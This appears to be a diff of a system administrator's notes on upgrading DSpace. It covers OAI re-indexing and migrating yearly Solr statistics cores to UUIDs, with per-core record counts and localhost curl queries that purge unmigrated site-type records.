                                                                                                                                                                                                                                                                                                                                                                                                                              The process ran out of memory several times so I had to keep trying again with more JVM heap memory.

                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                              $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx2048m"
                                                                                                                                                                                                                                                                                                                                                                                                                              +$ dspace oai -c import
                                                                                                                                                                                                                                                                                                                                                                                                                              +

                                                                                                                                                                                                                                                                                                                                                                                                                              The process ran out of memory several times so I had to keep trying again with more JVM heap memory.

                                                                                                                                                                                                                                                                                                                                                                                                                              Processing Solr Statistics With solr-upgrade-statistics-6x

                                                                                                                                                                                                                                                                                                                                                                                                                              After the main upgrade process was finished and DSpace was running I started processing the Solr statistics with solr-upgrade-statistics-6x to migrate all IDs to UUIDs.

                                                                                                                                                                                                                                                                                                                                                                                                                              statistics

                                                                                                                                                                                                                                                                                                                                                                                                                              First process the current year’s statistics core:

                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                              $ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx2048m'
                                                                                                                                                                                                                                                                                                                                                                                                                              -$ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics
                                                                                                                                                                                                                                                                                                                                                                                                                              -...
                                                                                                                                                                                                                                                                                                                                                                                                                              -=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                              -        *** Statistics Records with Legacy Id ***
                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                              -           3,817,407    Bistream View
                                                                                                                                                                                                                                                                                                                                                                                                                              -           1,693,443    Item View
                                                                                                                                                                                                                                                                                                                                                                                                                              -             105,974    Collection View
                                                                                                                                                                                                                                                                                                                                                                                                                              -              62,383    Community View
                                                                                                                                                                                                                                                                                                                                                                                                                              -             163,192    Community Search
                                                                                                                                                                                                                                                                                                                                                                                                                              -             162,581    Collection Search
                                                                                                                                                                                                                                                                                                                                                                                                                              -             470,288    Unexpected Type & Full Site
                                                                                                                                                                                                                                                                                                                                                                                                                              -        --------------------------------------
                                                                                                                                                                                                                                                                                                                                                                                                                              -           6,475,268    TOTAL
                                                                                                                                                                                                                                                                                                                                                                                                                              -=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                              -

                                                                                                                                                                                                                                                                                                                                                                                                                              After several rounds of processing it finished. Here are some statistics about unmigrated documents:

                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                              $ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx2048m'
                                                                                                                                                                                                                                                                                                                                                                                                                              +$ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics
                                                                                                                                                                                                                                                                                                                                                                                                                              +...
                                                                                                                                                                                                                                                                                                                                                                                                                              +=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                              +        *** Statistics Records with Legacy Id ***
                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                              +           3,817,407    Bistream View
                                                                                                                                                                                                                                                                                                                                                                                                                              +           1,693,443    Item View
                                                                                                                                                                                                                                                                                                                                                                                                                              +             105,974    Collection View
                                                                                                                                                                                                                                                                                                                                                                                                                              +              62,383    Community View
                                                                                                                                                                                                                                                                                                                                                                                                                              +             163,192    Community Search
                                                                                                                                                                                                                                                                                                                                                                                                                              +             162,581    Collection Search
                                                                                                                                                                                                                                                                                                                                                                                                                              +             470,288    Unexpected Type & Full Site
                                                                                                                                                                                                                                                                                                                                                                                                                              +        --------------------------------------
                                                                                                                                                                                                                                                                                                                                                                                                                              +           6,475,268    TOTAL
                                                                                                                                                                                                                                                                                                                                                                                                                              +=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                              +

                                                                                                                                                                                                                                                                                                                                                                                                                              After several rounds of processing it finished. Here are some statistics about unmigrated documents:

                                                                                                                                                                                                                                                                                                                                                                                                                              • 227,000: (*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)
                                                                                                                                                                                                                                                                                                                                                                                                                              • 471,000: id:/.+-unmigrated/
                                                                                                                                                                                                                                                                                                                                                                                                                              • 698,000: *:* NOT id:/.{36}/
                                                                                                                                                                                                                                                                                                                                                                                                                              • Majority are type: 5 (aka SITE, according to Constants.java) so we can purge them:
                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                              $ curl -s "http://localhost:8081/solr/statistics/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:* NOT id:/.{36}/</query></delete>"
                                                                                                                                                                                                                                                                                                                                                                                                                              -

                                                                                                                                                                                                                                                                                                                                                                                                                              statistics-2019

                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                              $ curl -s "http://localhost:8081/solr/statistics/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:* NOT id:/.{36}/</query></delete>"
                                                                                                                                                                                                                                                                                                                                                                                                                              +

                                                                                                                                                                                                                                                                                                                                                                                                                              statistics-2019

                                                                                                                                                                                                                                                                                                                                                                                                                              Processing the statistics-2019 core:

                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                              $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics
                                                                                                                                                                                                                                                                                                                                                                                                                              -...
                                                                                                                                                                                                                                                                                                                                                                                                                              -=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                              -        *** Statistics Records with Legacy Id ***
                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                              -           5,569,344    Bistream View
                                                                                                                                                                                                                                                                                                                                                                                                                              -           2,179,105    Item View
                                                                                                                                                                                                                                                                                                                                                                                                                              -             117,194    Community View
                                                                                                                                                                                                                                                                                                                                                                                                                              -             104,091    Collection View
                                                                                                                                                                                                                                                                                                                                                                                                                              -             774,138    Community Search
                                                                                                                                                                                                                                                                                                                                                                                                                              -             568,347    Collection Search
                                                                                                                                                                                                                                                                                                                                                                                                                              -           1,482,620    Unexpected Type & Full Site
                                                                                                                                                                                                                                                                                                                                                                                                                              -        --------------------------------------
                                                                                                                                                                                                                                                                                                                                                                                                                              -          10,794,839    TOTAL
                                                                                                                                                                                                                                                                                                                                                                                                                              -=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                              -

                                                                                                                                                                                                                                                                                                                                                                                                                              After several rounds of processing it finished. Here are some statistics about unmigrated documents:

                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                              $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics
                                                                                                                                                                                                                                                                                                                                                                                                                              +...
                                                                                                                                                                                                                                                                                                                                                                                                                              +=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                              +        *** Statistics Records with Legacy Id ***
                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                              +           5,569,344    Bistream View
                                                                                                                                                                                                                                                                                                                                                                                                                              +           2,179,105    Item View
                                                                                                                                                                                                                                                                                                                                                                                                                              +             117,194    Community View
                                                                                                                                                                                                                                                                                                                                                                                                                              +             104,091    Collection View
                                                                                                                                                                                                                                                                                                                                                                                                                              +             774,138    Community Search
                                                                                                                                                                                                                                                                                                                                                                                                                              +             568,347    Collection Search
                                                                                                                                                                                                                                                                                                                                                                                                                              +           1,482,620    Unexpected Type & Full Site
                                                                                                                                                                                                                                                                                                                                                                                                                              +        --------------------------------------
                                                                                                                                                                                                                                                                                                                                                                                                                              +          10,794,839    TOTAL
                                                                                                                                                                                                                                                                                                                                                                                                                              +=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                              +

                                                                                                                                                                                                                                                                                                                                                                                                                              After several rounds of processing it finished. Here are some statistics about unmigrated documents:

                                                                                                                                                                                                                                                                                                                                                                                                                              • 2,690,309: (*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)
                                                                                                                                                                                                                                                                                                                                                                                                                              • 1,494,587: id:/.+-unmigrated/
                                                                                                                                                                                                                                                                                                                                                                                                                              • 4,184,896: *:* NOT id:/.{36}/
                                                                                                                                                                                                                                                                                                                                                                                                                              • 4,172,929 are type: 5 (aka SITE) so we can purge them:
                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                              $ curl -s "http://localhost:8081/solr/statistics-2019/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:* NOT id:/.{36}/</query></delete>"
                                                                                                                                                                                                                                                                                                                                                                                                                              -

                                                                                                                                                                                                                                                                                                                                                                                                                              statistics-2018

                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                              $ curl -s "http://localhost:8081/solr/statistics-2019/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:* NOT id:/.{36}/</query></delete>"
                                                                                                                                                                                                                                                                                                                                                                                                                              +

                                                                                                                                                                                                                                                                                                                                                                                                                              statistics-2018

                                                                                                                                                                                                                                                                                                                                                                                                                              Processing the statistics-2018 core:

                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                              $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics-2018
                                                                                                                                                                                                                                                                                                                                                                                                                              -...
                                                                                                                                                                                                                                                                                                                                                                                                                              -=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                              -        *** Statistics Records with Legacy Id ***
                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                              -           3,561,532    Bistream View
                                                                                                                                                                                                                                                                                                                                                                                                                              -           1,129,326    Item View
                                                                                                                                                                                                                                                                                                                                                                                                                              -              97,401    Community View
                                                                                                                                                                                                                                                                                                                                                                                                                              -              63,508    Collection View
                                                                                                                                                                                                                                                                                                                                                                                                                              -             207,827    Community Search
                                                                                                                                                                                                                                                                                                                                                                                                                              -              43,752    Collection Search
                                                                                                                                                                                                                                                                                                                                                                                                                              -             457,820    Unexpected Type & Full Site
                                                                                                                                                                                                                                                                                                                                                                                                                              -        --------------------------------------
                                                                                                                                                                                                                                                                                                                                                                                                                              -           5,561,166    TOTAL
                                                                                                                                                                                                                                                                                                                                                                                                                              -=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                              -

                                                                                                                                                                                                                                                                                                                                                                                                                              After some time I got an error about Java heap space so I increased the JVM memory and restarted processing:

                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                              $ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx4096m'
                                                                                                                                                                                                                                                                                                                                                                                                                              -$ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics-2018
                                                                                                                                                                                                                                                                                                                                                                                                                              -

                                                                                                                                                                                                                                                                                                                                                                                                                              Eventually the processing finished. Here are some statistics about unmigrated documents:

                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                              $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics-2018
                                                                                                                                                                                                                                                                                                                                                                                                                              +...
                                                                                                                                                                                                                                                                                                                                                                                                                              +=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                              +        *** Statistics Records with Legacy Id ***
                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                              +           3,561,532    Bistream View
                                                                                                                                                                                                                                                                                                                                                                                                                              +           1,129,326    Item View
                                                                                                                                                                                                                                                                                                                                                                                                                              +              97,401    Community View
                                                                                                                                                                                                                                                                                                                                                                                                                              +              63,508    Collection View
                                                                                                                                                                                                                                                                                                                                                                                                                              +             207,827    Community Search
                                                                                                                                                                                                                                                                                                                                                                                                                              +              43,752    Collection Search
                                                                                                                                                                                                                                                                                                                                                                                                                              +             457,820    Unexpected Type & Full Site
                                                                                                                                                                                                                                                                                                                                                                                                                              +        --------------------------------------
                                                                                                                                                                                                                                                                                                                                                                                                                              +           5,561,166    TOTAL
                                                                                                                                                                                                                                                                                                                                                                                                                              +=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                              +

                                                                                                                                                                                                                                                                                                                                                                                                                              After some time I got an error about Java heap space so I increased the JVM memory and restarted processing:

                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                              $ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx4096m'
                                                                                                                                                                                                                                                                                                                                                                                                                              +$ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics-2018
                                                                                                                                                                                                                                                                                                                                                                                                                              +

                                                                                                                                                                                                                                                                                                                                                                                                                              Eventually the processing finished. Here are some statistics about unmigrated documents:

                                                                                                                                                                                                                                                                                                                                                                                                                              • 365,473: (*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)
                                                                                                                                                                                                                                                                                                                                                                                                                              • 546,955: id:/.+-unmigrated/
                                                                                                                                                                                                                                                                                                                                                                                                                              • 923,158: *:* NOT id:/.{36}/
                                                                                                                                                                                                                                                                                                                                                                                                                              • 823,293: are type: 5 so we can purge them:
                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                              $ curl -s "http://localhost:8081/solr/statistics-2018/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:* NOT id:/.{36}/</query></delete>"
                                                                                                                                                                                                                                                                                                                                                                                                                              -

                                                                                                                                                                                                                                                                                                                                                                                                                              statistics-2017

                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                              $ curl -s "http://localhost:8081/solr/statistics-2018/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:* NOT id:/.{36}/</query></delete>"
                                                                                                                                                                                                                                                                                                                                                                                                                              +

                                                                                                                                                                                                                                                                                                                                                                                                                              statistics-2017

                                                                                                                                                                                                                                                                                                                                                                                                                              Processing the statistics-2017 core:

                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                              $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics-2017
                                                                                                                                                                                                                                                                                                                                                                                                                              -...
                                                                                                                                                                                                                                                                                                                                                                                                                              -=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                              -        *** Statistics Records with Legacy Id ***
                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                              -           2,529,208    Bistream View
                                                                                                                                                                                                                                                                                                                                                                                                                              -           1,618,717    Item View
                                                                                                                                                                                                                                                                                                                                                                                                                              -             144,945    Community View
                                                                                                                                                                                                                                                                                                                                                                                                                              -              74,249    Collection View
                                                                                                                                                                                                                                                                                                                                                                                                                              -             479,647    Community Search
                                                                                                                                                                                                                                                                                                                                                                                                                              -             114,658    Collection Search
                                                                                                                                                                                                                                                                                                                                                                                                                              -             852,215    Unexpected Type & Full Site
                                                                                                                                                                                                                                                                                                                                                                                                                              -        --------------------------------------
                                                                                                                                                                                                                                                                                                                                                                                                                              -           5,813,639    TOTAL
                                                                                                                                                                                                                                                                                                                                                                                                                              -=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                              -

                                                                                                                                                                                                                                                                                                                                                                                                                              Eventually the processing finished. Here are some statistics about unmigrated documents:

                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                              $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics-2017
                                                                                                                                                                                                                                                                                                                                                                                                                              +...
                                                                                                                                                                                                                                                                                                                                                                                                                              +=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                              +        *** Statistics Records with Legacy Id ***
                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                              +           2,529,208    Bistream View
                                                                                                                                                                                                                                                                                                                                                                                                                              +           1,618,717    Item View
                                                                                                                                                                                                                                                                                                                                                                                                                              +             144,945    Community View
                                                                                                                                                                                                                                                                                                                                                                                                                              +              74,249    Collection View
                                                                                                                                                                                                                                                                                                                                                                                                                              +             479,647    Community Search
                                                                                                                                                                                                                                                                                                                                                                                                                              +             114,658    Collection Search
                                                                                                                                                                                                                                                                                                                                                                                                                              +             852,215    Unexpected Type & Full Site
                                                                                                                                                                                                                                                                                                                                                                                                                              +        --------------------------------------
                                                                                                                                                                                                                                                                                                                                                                                                                              +           5,813,639    TOTAL
                                                                                                                                                                                                                                                                                                                                                                                                                              +=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                              +

                                                                                                                                                                                                                                                                                                                                                                                                                              Eventually the processing finished. Here are some statistics about unmigrated documents:

                                                                                                                                                                                                                                                                                                                                                                                                                              • 808,309: (*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)
                                                                                                                                                                                                                                                                                                                                                                                                                              • 893,868: id:/.+-unmigrated/
                                                                                                                                                                                                                                                                                                                                                                                                                              • 1,702,177: *:* NOT id:/.{36}/
                                                                                                                                                                                                                                                                                                                                                                                                                              • 1,660,524 are type: 5 (SITE) so we can purge them:
                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                              $ curl -s "http://localhost:8081/solr/statistics-2017/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:* NOT id:/.{36}/</query></delete>"
                                                                                                                                                                                                                                                                                                                                                                                                                              -

                                                                                                                                                                                                                                                                                                                                                                                                                              statistics-2016

                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                              $ curl -s "http://localhost:8081/solr/statistics-2017/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:* NOT id:/.{36}/</query></delete>"
                                                                                                                                                                                                                                                                                                                                                                                                                              +

                                                                                                                                                                                                                                                                                                                                                                                                                              statistics-2016

                                                                                                                                                                                                                                                                                                                                                                                                                              Processing the statistics-2016 core:

                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                              $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics-2016
                                                                                                                                                                                                                                                                                                                                                                                                                              -...
                                                                                                                                                                                                                                                                                                                                                                                                                              -=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                              -        *** Statistics Records with Legacy Id ***
                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                              -           1,765,924    Bistream View
                                                                                                                                                                                                                                                                                                                                                                                                                              -           1,151,575    Item View
                                                                                                                                                                                                                                                                                                                                                                                                                              -             187,110    Community View
                                                                                                                                                                                                                                                                                                                                                                                                                              -              51,204    Collection View
                                                                                                                                                                                                                                                                                                                                                                                                                              -             347,382    Community Search
                                                                                                                                                                                                                                                                                                                                                                                                                              -              66,605    Collection Search
                                                                                                                                                                                                                                                                                                                                                                                                                              -             620,298    Unexpected Type & Full Site
                                                                                                                                                                                                                                                                                                                                                                                                                              -        --------------------------------------
                                                                                                                                                                                                                                                                                                                                                                                                                              -           4,190,098    TOTAL
                                                                                                                                                                                                                                                                                                                                                                                                                              -=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics-2016
                                                                                                                                                                                                                                                                                                                                                                                                                                +...
                                                                                                                                                                                                                                                                                                                                                                                                                                +=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                                +        *** Statistics Records with Legacy Id ***
                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                +           1,765,924    Bistream View
                                                                                                                                                                                                                                                                                                                                                                                                                                +           1,151,575    Item View
                                                                                                                                                                                                                                                                                                                                                                                                                                +             187,110    Community View
                                                                                                                                                                                                                                                                                                                                                                                                                                +              51,204    Collection View
                                                                                                                                                                                                                                                                                                                                                                                                                                +             347,382    Community Search
                                                                                                                                                                                                                                                                                                                                                                                                                                +              66,605    Collection Search
                                                                                                                                                                                                                                                                                                                                                                                                                                +             620,298    Unexpected Type & Full Site
                                                                                                                                                                                                                                                                                                                                                                                                                                +        --------------------------------------
                                                                                                                                                                                                                                                                                                                                                                                                                                +           4,190,098    TOTAL
                                                                                                                                                                                                                                                                                                                                                                                                                                +=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                • 849,408: (*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)
                                                                                                                                                                                                                                                                                                                                                                                                                                • 627,747: id:/.+-unmigrated/
                                                                                                                                                                                                                                                                                                                                                                                                                                • 1,477,155: *:* NOT id:/.{36}/
                                                                                                                                                                                                                                                                                                                                                                                                                                • 1,469,706 are type: 5 (SITE) so we can purge them:
                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                $ curl -s "http://localhost:8081/solr/statistics-2016/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:* NOT id:/.{36}/</query></delete>"
                                                                                                                                                                                                                                                                                                                                                                                                                                -

                                                                                                                                                                                                                                                                                                                                                                                                                                statistics-2015

                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                $ curl -s "http://localhost:8081/solr/statistics-2016/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:* NOT id:/.{36}/</query></delete>"
                                                                                                                                                                                                                                                                                                                                                                                                                                +

                                                                                                                                                                                                                                                                                                                                                                                                                                statistics-2015

                                                                                                                                                                                                                                                                                                                                                                                                                                Processing the statistics-2015 core:

                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics-2015
                                                                                                                                                                                                                                                                                                                                                                                                                                -...
                                                                                                                                                                                                                                                                                                                                                                                                                                -=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                                -        *** Statistics Records with Legacy Id ***
                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                -             990,916    Bistream View
                                                                                                                                                                                                                                                                                                                                                                                                                                -             506,070    Item View
                                                                                                                                                                                                                                                                                                                                                                                                                                -             116,153    Community View
                                                                                                                                                                                                                                                                                                                                                                                                                                -              33,282    Collection View
                                                                                                                                                                                                                                                                                                                                                                                                                                -              21,062    Community Search
                                                                                                                                                                                                                                                                                                                                                                                                                                -              10,788    Collection Search
                                                                                                                                                                                                                                                                                                                                                                                                                                -              52,107    Unexpected Type & Full Site
                                                                                                                                                                                                                                                                                                                                                                                                                                -        --------------------------------------
                                                                                                                                                                                                                                                                                                                                                                                                                                -           1,730,378    TOTAL
                                                                                                                                                                                                                                                                                                                                                                                                                                -=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                                -

                                                                                                                                                                                                                                                                                                                                                                                                                                Summary of stats after processing:

                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics-2015
                                                                                                                                                                                                                                                                                                                                                                                                                                +...
                                                                                                                                                                                                                                                                                                                                                                                                                                +=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                                +        *** Statistics Records with Legacy Id ***
                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                +             990,916    Bistream View
                                                                                                                                                                                                                                                                                                                                                                                                                                +             506,070    Item View
                                                                                                                                                                                                                                                                                                                                                                                                                                +             116,153    Community View
                                                                                                                                                                                                                                                                                                                                                                                                                                +              33,282    Collection View
                                                                                                                                                                                                                                                                                                                                                                                                                                +              21,062    Community Search
                                                                                                                                                                                                                                                                                                                                                                                                                                +              10,788    Collection Search
                                                                                                                                                                                                                                                                                                                                                                                                                                +              52,107    Unexpected Type & Full Site
                                                                                                                                                                                                                                                                                                                                                                                                                                +        --------------------------------------
                                                                                                                                                                                                                                                                                                                                                                                                                                +           1,730,378    TOTAL
                                                                                                                                                                                                                                                                                                                                                                                                                                +=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                                +

                                                                                                                                                                                                                                                                                                                                                                                                                                Summary of stats after processing:

                                                                                                                                                                                                                                                                                                                                                                                                                                • 195,293: (*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)
                                                                                                                                                                                                                                                                                                                                                                                                                                • 67,146: id:/.+-unmigrated/
                                                                                                                                                                                                                                                                                                                                                                                                                                • 262,439: *:* NOT id:/.{36}/
                                                                                                                                                                                                                                                                                                                                                                                                                                • 247,400 are type: 5 (SITE) so we can purge them:
                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                $ curl -s "http://localhost:8081/solr/statistics-2015/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:* NOT id:/.{36}/</query></delete>"
                                                                                                                                                                                                                                                                                                                                                                                                                                -

                                                                                                                                                                                                                                                                                                                                                                                                                                statistics-2014

                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                $ curl -s "http://localhost:8081/solr/statistics-2015/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:* NOT id:/.{36}/</query></delete>"
                                                                                                                                                                                                                                                                                                                                                                                                                                +

                                                                                                                                                                                                                                                                                                                                                                                                                                statistics-2014

                                                                                                                                                                                                                                                                                                                                                                                                                                Processing the statistics-2014 core:

                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics-2014
                                                                                                                                                                                                                                                                                                                                                                                                                                -...
                                                                                                                                                                                                                                                                                                                                                                                                                                -=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                                -        *** Statistics Records with Legacy Id ***
                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                -           2,381,603    Item View
                                                                                                                                                                                                                                                                                                                                                                                                                                -           1,323,357    Bistream View
                                                                                                                                                                                                                                                                                                                                                                                                                                -             501,545    Community View
                                                                                                                                                                                                                                                                                                                                                                                                                                -             247,805    Collection View
                                                                                                                                                                                                                                                                                                                                                                                                                                -                 250    Collection Search
                                                                                                                                                                                                                                                                                                                                                                                                                                -                 188    Community Search
                                                                                                                                                                                                                                                                                                                                                                                                                                -                  50    Item Search
                                                                                                                                                                                                                                                                                                                                                                                                                                -              10,918    Unexpected Type & Full Site
                                                                                                                                                                                                                                                                                                                                                                                                                                -        --------------------------------------
                                                                                                                                                                                                                                                                                                                                                                                                                                -           4,465,716    TOTAL
                                                                                                                                                                                                                                                                                                                                                                                                                                -=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                                -

                                                                                                                                                                                                                                                                                                                                                                                                                                Summary of unmigrated documents after processing:

                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics-2014
                                                                                                                                                                                                                                                                                                                                                                                                                                +...
                                                                                                                                                                                                                                                                                                                                                                                                                                +=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                                +        *** Statistics Records with Legacy Id ***
                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                +           2,381,603    Item View
                                                                                                                                                                                                                                                                                                                                                                                                                                +           1,323,357    Bistream View
                                                                                                                                                                                                                                                                                                                                                                                                                                +             501,545    Community View
                                                                                                                                                                                                                                                                                                                                                                                                                                +             247,805    Collection View
                                                                                                                                                                                                                                                                                                                                                                                                                                +                 250    Collection Search
                                                                                                                                                                                                                                                                                                                                                                                                                                +                 188    Community Search
                                                                                                                                                                                                                                                                                                                                                                                                                                +                  50    Item Search
                                                                                                                                                                                                                                                                                                                                                                                                                                +              10,918    Unexpected Type & Full Site
                                                                                                                                                                                                                                                                                                                                                                                                                                +        --------------------------------------
                                                                                                                                                                                                                                                                                                                                                                                                                                +           4,465,716    TOTAL
                                                                                                                                                                                                                                                                                                                                                                                                                                +=================================================================
                                                                                                                                                                                                                                                                                                                                                                                                                                +

                                                                                                                                                                                                                                                                                                                                                                                                                                Summary of unmigrated documents after processing:

                                                                                                                                                                                                                                                                                                                                                                                                                                • 182,131: (*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)
                                                                                                                                                                                                                                                                                                                                                                                                                                • 39,947: id:/.+-unmigrated/
                                                                                                                                                                                                                                                                                                                                                                                                                                • 222,078: *:* NOT id:/.{36}/
                                                                                                                                                                                                                                                                                                                                                                                                                                • 188,791 are type: 5 (SITE) so we can purge them:
                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                $ curl -s "http://localhost:8081/solr/statistics-2014/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:* NOT id:/.{36}/</query></delete>"
